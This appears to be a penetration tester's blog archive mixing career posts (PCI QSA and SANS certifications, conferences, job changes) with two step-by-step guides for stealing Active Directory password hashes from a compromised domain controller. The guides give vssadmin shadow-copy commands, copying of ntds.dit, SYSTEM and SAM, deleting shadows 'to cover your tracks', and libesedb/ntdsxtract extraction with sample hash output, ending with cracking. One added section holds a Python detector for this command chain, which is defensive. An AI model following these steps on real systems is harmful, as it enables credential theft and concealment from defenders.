PCI PA/P2PE certifications

Took the Payment Application (PA) Qualified Security Assessor (QSA) exam back in March, just a couple of weeks after taking the Point-to-Point Encryption (P2PE) QSA exam. Surprisingly, they both seemed fairly easy tests; the P2PE was a little harder since I had to study up on some crypto information.

Had been trying for a few months to assist with some P2PE assessment work, but it seems that is not as easy as I had hoped. Had asked to shadow some people or assist on small projects, but got nothing. I then asked to work on PA assessments, was invited out to the Colorado office to learn the internal processes and go over some documents, and was asked by the managing principal if I was interested in joining the PA team.

Finally decided to stop trying to get into the P2PE team, and took an opportunity on the PA team. Applied for a Senior Consultant position, but was only transferred over as an IT Security Consultant. Not exactly sure what the deal is with promoting me to Senior, especially since I have more experience than most Senior Consultants that I have worked with so far. But that battle is for another day.

Will see how things go with doing the PA assessments; they do not seem to be very difficult, and most of the testing is easy. The pentesting portion is kind of a joke, as they do only minor tests against SQLi, XSS, CSRF and buffer overflows. Almost makes me miss doing the pentesting stuff and exploiting software vulnerabilities.

Starting off 2017 right! (I hope…..)

Well, it's 2017 already, and I am not sure where 2016 went.

Last year I was extremely busy, traveling about every week with multiple ROCs due weekly for my previous company. Never had enough time to actually do my job well or even think about fixing the issues that we had. Now that I am at Coalfire, I have plenty of time to do my job, with tons of resources to help me out. I am not traveling as much, which I sort of miss; hope that changes a little starting soon. Working from home is a little weird, not sure it is something I really like; I miss the interactions with other people. Not that I do not like my family, it's just getting out of the house for a little while and talking to other people with similar interests. Will be trying to get former colleagues to do lunch once in a while to at least try to keep up with what's going on.

This year is starting off fairly decent for me, since I am getting to attend two different training classes. The first one is an ISO 27001 Lead Auditor certification course; I will be heading to Colorado for a few days. The class was supposed to be for junior associates that needed a certification to allow them to get their QSA. I asked if there was space, since I would like to attend, and I guess there was room for me. The second class is PCI P2PE certification, which will be a little harder from my perspective. Most of my cryptography experience is military related and not really geared towards the commercial sector. If I pass this course, I have been asked if I wanted to take the PA-DSS course and then possibly the PA-P2PE course. Since they are in need of people to assist in that area, I said why not. I am always willing to take training classes; certifications never hurt anyone.

So it looks like the first full ROC I am lead on will be a client that they have had for a while. This should be fairly nice, to get to learn their methodology and show my manager I am able to do the work. I was brought in as a consultant, and not a senior consultant. That was something I had decided to do: I originally had interviewed for a senior security consultant position, but since they were willing to pay me the same for either position, I took the lower level position. I am sure some are going WTF, I would never do that. Well, I am more than capable of being a senior consultant, but if I come in as a junior level person and can show that I am very good at my job, I will more than likely get a promotion or possibly opportunities to do other stuff. Which is sort of what is happening already with the certification courses.

Well 2017, let's hope things keep rolling along smoothly…..

Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I am currently splitting my time between doing penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles. One gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well, since the one boss does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customer's doing PCI work. It usually never works out in my favor, and makes for working long hours, with no compensation for it.
My boss's boss (our COO) said that on Jan 1 2016 I will move over to the PCI group but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The one thing that makes this a pain is they already hired a person to fill my spot on the team, but another person left in November, leaving another shortage. The interesting thing is this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:\>vssadmin list shadows
Example: 'vssadmin list shadows' no Shadows Available
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:\>vssadmin create shadow /for=C:
Example: 'vssadmin create shadow' copy:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\\?\GLOBALROOT\Device\<SHADOW COPY DISK>\windows\<directory>\<File> <where to put file>

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the examples above the latest version is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLM\SYSTEM c:\SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow={e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Now that you have the files, it is time to get the hashes
Utilities needed:
• libesedb
• ntdsxtract
libesedb
Download libesedb: (use whichever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
Running esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsusers.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
--sid <user sid>
List user identified by SID
--guid <user guid>
List user identified by GUID
--name <user name regexp>
List user identified by the regular expression
--active
List only active accounts
--locked
List only locked accounts
--syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile <name of the LM hash output file>
--ntoutfile <name of the NT hash output file>
--pwdformat <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
ocl - oclHashcat format
When this format is specified the NT output file will be used
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
--debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
--lmoutfile (output file for LM hashes)
--ntoutfile (output file for NTLM hashes)
--pwdformat john (output in JTR format)
--syshive (SYSTEM file from the system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>
(Add --passwordhistory to get previous hashes for each user; the number of hashes per user will vary based on the Domain settings for password history)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john
The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need…. it is time to start cracking passwords to get to that data you wanted…

Passed the GWAPT cert

I took the SANS GIAC Web Application Penetration Tester (GWAPT) class back in December of 2014 in Washington DC with Eric Conrad. Had been procrastinating for several months before I finally had to break down and take the certification before my time expired in late April 2015.
Spent a few days going over the books to refresh me on the content that we went over, and took one of the practice exams and actually did not do too well on it. Never having taken a SANS cert before, I was not sure what to expect, and probably should have actually allowed for the 2 hours to sit the practice test. Rushed through it and guessed a lot of the questions, and did not remember going over half of the info. (Note to self: actually read the questions and each answer and not just say that looks good.) Overall I was a little frustrated after the first practice exam, since I have been doing this for about 3 years now, and many of the questions seemed to be based on opinion, and not actual facts. Several of the questions had more to do with general penetration testing than actual web application testing, like needing to know the TTL from a DNS request for a domain name.
So I read the books a few more days before taking the second practice test, which I did much better on, since I had some idea of what to expect on the test. Did rush through it again, actually did the entire test in 48 minutes. Which is really not that great, but I just wanted to make sure I had some idea what the real test would be like. Two days later I sat for the actual GWAPT test, and planned to take my time and read every question thoroughly.
Sat for the exam on April 9, 2015. Finished the test and passed it fairly easily, but was somewhat perplexed that it had nothing similar to the practice tests. It seemed that the practice exams had nothing to do with the actual exam. Many of the questions were topics that were in the books, but never brought up in the practice tests. Which frustrated me a little, since I had to spend a little more time looking for some of the answers that I had not really gone over previously.
So anyone planning on sitting the exam who has not taken a SANS cert before, plan accordingly to make sure you know all of the content in the books. Do not expect that the practice exams will actually prepare you for the real test; they might actually make you study information that is never asked on the exam.

SANS SEC 542 – Washington DC CDI

Attended SANS SEC 542 Web App Penetration Testing and Ethical Hacking class in Washington DC at the Grand Hyatt from December 12 – 17 2014.
The instructor was Eric Conrad, and the class was fairly decent, and is a good start for anyone wanting to learn web application pentesting. I already had some extensive knowledge of web app testing, but decided to take the course anyway to see what SANS courses were like.
Learned a few things, but primarily knew most of the course material; most of the new things I learned are tool related. I do not usually use ZAP or W3AF, and since we used them in class I learned a few things about them and their capabilities.
There was a wide variety of people in the class, with about 30 students in the classroom and about 15 online students. We had some that had no pentesting abilities, and some with a couple years' experience.
The class was a six day course:
      DAY 1 : Attacker’s View, Pentesting and Scoping
      DAY 2 : Recon & Mapping
      DAY 3 : Discovery
      DAY 4 : Discovery Continued
      DAY 5 : Exploitation
      DAY 6 : Capture the Flag
My team completed the CTF first, but Eric Conrad could not decide who yelled out first, so he called it a tie with the team sitting just behind us.
The biggest things I learned from the class were actually not taught in the classroom; it was talking to the people there who are doing pentesting and work in the security community. Plus the additional talks that were held after classes were well worth staying up late and not going sightseeing around DC.
Now I just need to figure out how to get my boss to allow me to attend another one next year.

Derbycon 4.0

Well Derbycon 4.0 is over, and now things have to go back to normal.
My boss has already scheduled me 3 new projects, and I have not finished last week's projects because I was too excited to get to Derbycon.
Completed the Urban Bourbon Trail (all in half a day, which I do not recommend unless you have the full day). Started at 2pm on Thursday after arriving at the Hyatt in Louisville, KY, and was done by 8pm that night. Felt terrible most of Friday morning, but it did not stop me from getting in on the CTF.
Had a blast at Derbycon, spent most of my time playing CTF and hanging out with friends.
Team nanerpwn came in 2nd place in the CTF, and we had a good lead for most of the time on Friday and Saturday. Could not hold on to the lead towards the end, had a few people drop off to head back home early. So maybe next year we will come in 1st, if we can get everyone to stay until Sunday afternoon.
Ready for Derbycon 5.0

Bahrain – Working for another manager is trying my patience

Well I am almost done with my small tour in Bahrain, and will be glad to be home. I will miss some of the people, they are great and were a joy to work with.
As for the project that my company is contracted on, I am a little pissed that nothing has really been done, since I last left from working over here. Well none of the projects that we were supposed to be working on. Many of the other vendors that had projects have finished, or are scheduled to finish their projects. It seems that the manager in charge has either not worried about the project or is clueless that his employees are lying to him.
The two people that were hired to come over here and work for the last year, who are not security minded people by the way, did almost nothing during the time they were over here. From what I can tell, it looks like they relied on other vendors to do most of the work and they took all of the credit for it. Most of the projects are not even actually started, but are marked as partially complete. I have been working on a Bit9 installation for a couple of weeks; there are 1200+ workstations in the environment, and only 130 systems have the software installed. There are no real policies defined, and only two workstations are locked down. The manager believes that all systems have the software installed and they are completely protected; I tried to let him know, and he did not seem to want to hear it. I dropped the conversation and began working on a solution to the issue.
I am ready to get back to pentesting, where I can actually do some good, well I will keep telling myself that. Many of my customers just want a band-aid to cover over the problems, and not really work on fixing things, but I still get to have fun in the process.

Pentesting Companies – Praetorian

I have been researching a few pentesting companies over the past few months, just to compare my current employer to others. I am happy at my current employer, I enjoy what I do, and most of the people I work with. I am just curious what other companies do for their employees, and what they require from them.
Through my research I noticed that many of them give fairly good benefits, and seem to have a relaxed work environment.
I was surprised that several require their employees to speak at conferences, write white-papers, and do research. While I am not against any of this, I am wondering how they would have time to accomplish any of it. I am booked solid usually weeks on end, with maybe a day or less of down time a month. Many also require 25% or more travel, which I am not opposed to either, but I generally do most of my assessments remotely. I have complained to my boss that we do not travel to customers enough. I prefer to do some face-to-face conversations with my customers to get a better understanding of their needs. Plus it makes it easier to social engineer information from someone.
I was fairly impressed with Praetorian, whose headquarters are in Austin, TX. They seem to have some very skilled and knowledgeable consultants, who are involved in the security community and open-source projects. They seem to be involved with the local college (University of Texas), having career expos at UT. They also have some small puzzles that you can try to work. I will have to try these when I get some spare time.
A Job Posting for a “Senior Security Consultant (Software)”
Qualifications: Successful candidates should have:
  1. 2-5 years of information security experience
  2. 1-2 years of consulting experience
  3. Strong understanding of software and application security
  4. Experience with languages such as C, C++, Java, .NET, Ruby, and Python
  5. Strong oral and written communication skills
  6. Involvement in software community via OWASP, WASC, and/or open source development highly desirable
  7. Track record speaking at major security conferences such as OWASP Appsec, SANS Appsec, and Blackhat highly desirable
  8. Ability to travel 10% of the time
  9. Minimum 4-Year Bachelor of Science Degree in Computer Science, Engineering, or equivalent from a “top ten” institution.
While the travel is a lot less than many of the other companies, they require a person who is good at public speaking at large conferences and is involved in the security community.
Well, I guess if I wanted to go and work for them, I need to start speaking at conferences and get more involved in the security community. Not really going back to college to get a degree from a “Top Ten” institution unless someone else is willing to pay for it.

Getting Hashes from NTDS.dit file

Read a write-up from @Mubix about doing this and noticed that some changes had come to the NTDSXtract software which made things a little easier, so I decided to do a write-up on the two versions.
Why do you want to do this anyways?
The reason you would want to pull the ntds.dit file from a Domain Controller after you have compromised it is because you do not want to create a new Domain Administrator account (which could set off alerts) and need password hashes; or you need a password for another account to access data you want (i.e. SQL Server accounts).

Get the ntds.dit and SYSTEM from Volume Shadow Copy on a Domain Controller

1. Vssadmin tool

1.1 List Volume Shadow Copies on the system:

Example: ‘vssadmin list shadows’ no Shadows Available
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.

1.2. Create a new Volume Shadow Copy of the current drive:

Example: ‘vssadmin create shadow’ copy:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

2. Pull files from the Volume Shadow copy

copy \\?\GLOBALROOT\Device\<SHADOW COPY DISK>\windows\<directory>\<File> <where to put file>
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the examples above the latest version is HarddiskVolumeShadowCopy1 (there could be multiple copies, use the last one listed)
I would also recommend getting a current copy of SYSTEM from the registry just in case.
reg SAVE HKLM\SYSTEM c:\SYS
I have had a couple times where the SYSTEM file from the shadow copy was corrupt.

3. Delete the shadows to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
vssadmin delete shadows /for=C: /shadow={e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
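From the defender's side, steps 1 to 3 above (and the same sequence in the "Updated Version" post earlier on this page) leave a very recognisable trail in process-creation logging: vssadmin creating a shadow, a copy of ntds.dit or a registry hive out of a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path, reg.exe saving HKLM\SYSTEM, and vssadmin deleting the shadow again. Any one of these on its own is noisy (backup agents create and delete shadow copies all day), so the useful detection is the chain. The following Python is an added example, not code from the original post or from any of the tools it uses; the event records and command lines are constructed to look like Security 4688 / Sysmon Event ID 1 fields, and the field layout, the stage names and the 30 minute window are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each stage of the shadow-copy credential-dump sequence from the write-up,
# matched against process command lines (assumed field: one string per event).
STAGES = [
    ("vss_create", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow", re.I)),
    # ntds.dit or a registry hive read straight out of a shadow-copy device path
    ("ntds_from_shadow", re.compile(
        r"HarddiskVolumeShadowCopy\d+\\.*?(ntds\.dit|config\\SYSTEM|config\\SAM)\b", re.I)),
    ("reg_save_system", re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I)),
    ("vss_delete", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I)),
]

# Constructed sample events: (ISO timestamp, host, user, command line)
SAMPLE_EVENTS = [
    # the full sequence from the write-up on a domain controller
    ("2017-03-01T02:00:05", "DC01", r"CORP\admin", r"vssadmin create shadow /for=C:"),
    ("2017-03-01T02:00:40", "DC01", r"CORP\admin",
     r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp\ntds.dit"),
    ("2017-03-01T02:00:41", "DC01", r"CORP\admin",
     r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\temp\SYSTEM"),
    ("2017-03-01T02:01:10", "DC01", r"CORP\admin", r"reg SAVE HKLM\SYSTEM C:\temp\SYS"),
    ("2017-03-01T02:02:00", "DC01", r"CORP\admin",
     r"vssadmin delete shadows /for=C: /shadow={placeholder-shadow-id}"),
    # a backup agent making a shadow copy on a file server: benign noise
    ("2017-03-01T03:00:00", "FS01", r"NT AUTHORITY\SYSTEM", r"vssadmin list shadows"),
    ("2017-03-01T03:00:01", "FS01", r"NT AUTHORITY\SYSTEM", r"vssadmin create shadow /for=D:"),
    # ntds.dit copied out of a pre-existing shadow copy, with no create or delete seen
    ("2017-03-02T09:15:00", "DC02", r"CORP\svc_backup",
     r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit E:\staging\ntds.dit"),
    ("2017-03-02T10:00:00", "WS22", r"CORP\bob", r"notepad.exe C:\Users\bob\notes.txt"),
]


def analyze(events, window=timedelta(minutes=30)):
    """Group stage hits per host and rate the observed sequence."""
    per_host = defaultdict(list)
    for ts, host, user, cmd in events:
        for name, rx in STAGES:
            if rx.search(cmd):
                per_host[host].append((datetime.fromisoformat(ts), name, user))

    report = {}
    for host, hits in per_host.items():
        hits.sort()
        first = {}  # earliest time each stage was seen on this host
        for when, name, _user in hits:
            first.setdefault(name, when)
        create, read, delete = (first.get(k) for k in ("vss_create", "ntds_from_shadow", "vss_delete"))
        chained = (create is not None and read is not None
                   and timedelta(0) <= read - create <= window)
        if read is None:
            level = "info"      # shadow-copy housekeeping alone is common (backup agents)
        elif chained and delete is not None and delete >= read:
            level = "critical"  # create -> copy DIT/hive -> delete: the full sequence
        else:
            level = "high"      # the DIT or a hive copied out of a shadow copy is rarely legitimate
        report[host] = {"stages": sorted(first), "level": level,
                        "users": sorted({u for _, _, u in hits})}
    return report


if __name__ == "__main__":
    for host, info in analyze(SAMPLE_EVENTS).items():
        print(host, info["level"], ", ".join(info["stages"]), info["users"])
```

The rating deliberately treats the copy out of the shadow-copy path as the anchor: FS01 only ever creates a shadow and stays at "info", DC02 reads ntds.dit from a shadow someone else created and is "high", and DC01 shows the create, copy and delete within minutes and is "critical". Feeding real 4688 or Sysmon data in means mapping the CommandLine, Computer and SubjectUserName fields onto the tuple layout assumed here.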

4. Optional VSSOwn Script to help with this task:

http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

5. Now that you have the files, it is time to get the hashes

5.1 Utilities needed:

  • libesedb
  • ntdsxtract

5.2 libesedb

https://code.google.com/p/libesedb/
http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

Extract the files

# tar -xzvf libesedb-alpha-20120102.tar.gz

Compile/make libesedb

# cd libesedb-20120102
# ./configure
# make
Need to move this somewhere like '/usr/local/'
# mv esedbtools/ /usr/local
# cd /usr/local/esedbtools/

esedbexport usage:

Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source
source: the source file
-c:     codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h:     shows this help
-l:     logs information about the exported items
-m:     export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t:     specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T:     exports only a specific table
-v:     verbose output to stderr
-V:     print version

Run esedbexport to extract ntds.dit data :

./esedbexport  -t  <Directory to export data to(will add .export to the end)> <ntds.dit file>
# ./esedbexport  -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.

Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

5.3 NTDSXtract:

http://www.ntdsxtract.com/
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip
# unzip ntdsxtract_v1_0.zip
# cd "NTDSXtract 1.0/"
To update to the new 1.2 Beta version, unzip the contents inside the “NTDSXtract 1.0” directory
(You might want to rename the directory to just NTDSXtract)
# unzip ntdsxtract_v1_2_beta.zip

Usage for dsusers.py (Version 1.0 and 1.2 Beta)

Ver 1.0
 # python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py <datatable> <linktable> [option]
options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
--passwordhashes <system hive>
Extract password hashes
--passwordhistory <system hive>
Extract password history
--certificates
Extract certificates
--supplcreds <system hive>
Extract kerberos keys
--membership
List groups of which the user is a member
Ver 1.2
 # python "../NTDSXtract 1.0/dsusers.py"
DSUsers v1.2
Extracts information related to user objects
usage: ../NTDSXtract 1.0/dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
  linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its
cache files and output files. If the directory does not exist
it will be created.

options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
    --syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile    <name of the LM hash output file>
--ntoutfile      <name of the NT hash output file>
--pwdformat  <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
--passwordhashes
Extract password hashes
    --passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract kerberos keys
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the output

Extract user info:

Ver 1.0
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 --passwordhashes ~/sys --passwordhistory ~/sys
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 40933 records processed
Extracting schema information - 100% -> 4142 records processed
Extracting object links...

List of users:
==============
Record ID:           1815
User name:           Administrator
User principal name: Administrator@DOMAIN
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 3543ea4c-f755-4758-97c0-3d63dffc96ad
SID:  S-1-5-21-657512695-1375287660-316888650-500
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 16:10:29
Account expires:      Never
Password last set:    2006-08-22 11:53:34.828125
Last logon:           2013-10-03 19:11:25.366397
Last logon timestamp: 2013-09-30 10:43:09.479359
Bad password time     2013-10-03 17:36:20.168265
Logon count:          65535
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Domain Admins Administrator
Password hashes:
    Administrator:$NT$0817033191709a45c93baa986d933d0e:::
Password history:
    Administrator_nthistory0:$NT$0817033191709a45c93baa986d933d0e:::
    Administrator_nthistory1:$NT$70aa17fabbaf3b0511f430844c6de431:::
    Administrator_lmhistory0:f8eab0fa471aff3edab057c59e5d0aa5:::
Record ID:           1816
User name:           Guest
User principal name:
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2e792141-c4be-43b2-a4f5-079e5d05e184
SID:  S-1-5-21-657512695-1375287660-316888650-501
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 15:19:28
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     2013-10-03 18:18:45.096975
Logon count:          0
Bad password count:   1
User Account Control:
Disabled
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Users Guest
Password hashes:
Password history:
….(Continues for each Account)….
Ver 1.2 (Output in JTR Format)
